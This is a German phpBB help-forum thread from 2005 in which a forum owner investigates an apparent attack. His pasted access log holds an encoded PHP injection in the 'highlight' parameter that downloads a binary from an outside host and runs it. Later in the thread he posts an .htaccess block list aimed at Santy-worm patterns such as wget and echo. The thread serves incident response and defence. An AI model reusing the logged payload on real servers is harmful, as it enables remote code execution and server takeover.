Seite 1 von 3
Hilfe - wurde gehackt 2.0.15
Verfasst: 27.05.2005 15:05
von maxl
Mein Forum (2.0.15) wurde offenbar gehackt!
Mein Provider hat meinen Account vorübergehend deaktiviert, da offensichtlich über ein Skript von phpbb der Server stark überlastet wurde.
In den Logfiles hab ich folgenden Eintrag gefunden:
Code: Alles auswählen
modemcable118.234-80-70.mc.videotron.ca - - [27/May/2005:01:17:15 +0200] "GET /phpbb/viewtopic.php?p=2415&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(109)%252echr(107)%252echr(100)%252echr(105)%252echr(114)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(47)%252echr(46)%252echr(114)%252echr(48)%252echr(48)%252echr(116)%252echr(59)%252echr(32)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(47)%252echr(46)%252echr(114)%252echr(48)%252echr(48)%252echr(116)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(118)%252echr(111)%252echr(105)%252echr(108)%252echr(97)%252echr(46)%252echr(102)%252echr(114)%252echr(47)%252echr(114)%252echr(111)%252echr(48)%252echr(116)%252echr(47)%252echr(115)%252echr(116)%252echr(111)%252echr(110)%252echr(101)%252echr(59)%252echr(32)%252echr(109)%252echr(118)%252echr(32)%252echr(115)%252echr(116)%252echr(111)%252echr(110)%252echr(101)%252echr(32)%252echr(115)%252echr(115)%252echr(104)%252echr(100)%252echr(115)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(115)%252echr(115)%252echr(104)%252echr(100)%252echr(115)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(115)%252echr(115)%252echr(104)%252echr(100)%252echr(115)%252echr(32)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2
Ich vermute, daß in der
viewtopic.php ein Fehler steckt.
Bitte um Hilfe!!!
Vielen Dank
maxl
Verfasst: 27.05.2005 16:12
von larsneo
der von dir angesprochene highlight-fehler ist seit einigen version (2.0.11?) bereits gefixt - wichtig an dieser stelle wäre, ob dein forum wirklich gehackt worden ist oder aber ob 'nur' durch massive zugriffe auf die url ein 'denial of service' verursacht wurde. letzteres kann durch durch eine entsprechende .htaccess verhindern.
Verfasst: 27.05.2005 16:21
von maxl
Hmm, habe alle Updates seit 2.0.6 immer brav gemacht!
Am Board selbst ist nichts sichtbar - es hat sich also niemand irgendwie als Hacker verewigt.
Lt. meinem Provider wurde der Server stark überlastet!
Eine .htaccess habe ich für den Adminbereich eingerichtet - oder meinst du da eine für etwas anderes?
Bitte um einen Tipp was ich tun muß - vielen Dank!
maxl
EDIT: habe die "modemcable118.234-80-70.mc.videotron.ca" jetzt im Board mal gebannt - ich hoffe das bringt momentan mal was!
Verfasst: 29.05.2005 16:04
von maxl
** push **
Bitte um Hilfe!
maxl
Verfasst: 29.05.2005 16:17
von kratzer54847
ist denn in der Datenbank noch alles in Ordnung?
Verfasst: 29.05.2005 17:52
von maxl
kratzer54847 hat geschrieben:ist denn in der Datenbank noch alles in Ordnung?
Da bräuchte ich mal einen Tipp wie ich das überprüfen kann! Wie könnte ein verdächtiger Eintrag in der DB aussehen? (wie ich in die DB komme weiß ich schon - nur wo und welcher Eintrag ist zu prüfen?)
maxl
Verfasst: 29.05.2005 17:54
von Jan500
zb die userliste ob außer dir noch andere user nen admin-user-level haben usw...
oder ob was in der phpbb_config table verstellt ist usw...
Jan
Verfasst: 29.05.2005 19:00
von rabbit
maxl hat geschrieben:Eine .htaccess habe ich für den Adminbereich eingerichtet - oder meinst du da eine für etwas anderes?
schau mal
hier.
Verfasst: 29.05.2005 19:02
von kratzer54847
die Usertabelle, die Thementabelle und die Posttabellen wären in de Fall interessant!
mfg Johny
Verfasst: 29.05.2005 21:43
von maxl
Hallo Leute!
Vielen Dank für die nette Unterstützung!
Hab jetzt mal in meiner DB nachgeschaut - es gibt da:
1) den User "Anonymous" mit der user_id: -1
2) einen ohne irgendwas (kein Name, kein Passwort) mit der user_id: 0
3) mich als Admin mit der user_id: 2
4) alle weiteren User mit fortlaufender ID
Der User 2 macht mich irgendwie stutzig, da mir der bisher noch nie aufgefallen ist!
@kratzer54847
Worauf muß ich in den Tabellen Themen und Post achten?
Nochmals Danke für eure Hilfe!
maxl
EDIT:
@rabbit & larsneo:
in meiner .htaccess im root habe ich folgendes:
Code: Alles auswählen
RewriteEngine On
# prevent access from santy webworm
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
RewriteCond %{REQUEST_FILENAME} /phpbb/forums.html
RewriteRule (.*) /phpbb/index.php [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/viewforum([0-9]*)-([0-9]*)-([0-9]*).html
RewriteRule (.*) /phpbb/viewforum.php?f=%1&topicdays=%2&start=%3 [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/forum([0-9]*).html
RewriteRule (.*) /phpbb/viewforum.php?f=%1 [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/ptopic([0-9]*).html
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&view=previous [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/ntopic([0-9]*).html
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&view=next [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*)-([0-9]*)-([a-zA-Z]*)-([0-9]*).html
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&postdays=%2&postorder=%3&start=%4 [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*)-([0-9]*).html
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&start=%2 [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*).html
RewriteRule (.*) /phpbb/viewtopic.php?t=%1 [L]
RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*).html
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&start=%2&postdays=%3&postorder=%4&highlight=%5 [L]
ist das O.K. oder muß ich was ändern?